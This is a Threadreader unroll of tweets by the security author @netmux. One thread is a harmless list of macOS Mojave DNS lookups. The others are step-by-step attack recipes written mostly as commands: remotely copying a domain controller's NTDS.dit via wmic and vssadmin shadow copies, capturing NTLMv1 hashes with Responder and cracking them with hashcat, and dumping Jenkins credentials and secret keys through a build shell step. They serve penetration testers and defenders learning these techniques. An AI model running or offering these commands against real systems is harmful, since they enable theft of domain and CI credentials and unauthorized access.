Share this page!

Enter URL or ID to Unroll

You can paste full URL like: https://x.com/threadreaderapp/status/1644127596119195649
or just the ID like: 1644127596119195649

How to get URL link on X (Twitter) App

  1. On the Twitter thread, click on or icon on the bottom
  2. Click again on or Share Via icon
  3. Click on Copy Link to Tweet
  4. Paste it above and click "Unroll Thread"!
  5. More info at Twitter Help
Netmux Profile picture
Netmux
@netmux
Dad-Husband-Vet-Passwords @netmux@infosec.exchange Operator Handbook: https://t.co/Wbst8aQZYH Hash Crack: https://t.co/3auNNKgcAV
Ibrahim Ali Khan Profile picture 1 subscribed
May 15, 2019 10 tweets 9 min read
(1/10) Wondered what DNS lookups occur on fresh install of MacOS Mojave? Here is a 4 hour window with only default apps installed & no AppleID setup. 75 Total:
http://a1051.b.akamai[.]net
http://a239.gi3.akamai[.]net
api-glb-ash.smoot.apple[.]com
api.apps.apple[.]com (2/10)
api.smoot.apple[.]com
apple-finance.query.yahoo[.]com
apple[.]com
apple[.]comscoreresearch[.]com
appleid.apple[.]com
apps.mzstatic[.]com
ax.itunes.apple[.]com
buy.itunes.apple[.]com
c.apple.news
c14621952.mgr.gcsp.cddbp[.]net
May 2, 2019 4 tweets 1 min read
REMOTELY EXTRACT NTDS.DIT & SYSTEM hive

STEP 1: Use ‘wmi’ to execute ‘vssadmin’ to create new volume shadow copy:

wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c vssadmin create shadow /for=C: 2>&1" STEP 2: Extract ‘ntds.dit’ from the new volume shadow copy:

wmic /node:DC_hostname /user:DOMAIN\Username /password:password123 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"
Apr 15, 2019 6 tweets 3 min read
HOW TO EXTRACT NTLM HASH FROM NTLMv1 HASH:

STEP 1-Capture NTLMv1 hash with or without SSP using responder.
STEP 2-Download NTLMv1-Multi tool
github.com/evilmog/ntlmv1…
python ntlmv1.py --nossp <ntlmv1_hash_nossp>
python ntlmv1-ssp.py --ssp <ntlmv1_hash_ssp> STEP 3-Add following DES hashes into hashes.txt:
727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788

STEP 4-Load into Hashcat and crack:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1
Apr 8, 2019 5 tweets 2 min read
DUMP PASSWORDS FROM JENKINS:

STEP 1: Log into Jenkins server build user:
https://<Jenkins_IP>/script/

STEP 2: Follow:
New Item -> Freeform Build
“New Project”-> Configure -> General -> Restrict Where This Is Run -> Enter “Master” -> Build -> Add Build Step -> Execute Shell STEP 3: Execute these cmds in shell:

echo ""
echo "credentials.xml"
cat ${JENKINS_HOME}/credentials.xml
echo ""
echo "master.key"
cat ${JENKINS_HOME}/secrets/master.key | base64 -w 0
echo ""
echo "hudson.util.Secret"
cat ${JENKINS_HOME}/secrets/hudson.util.Secret | base64 -w 0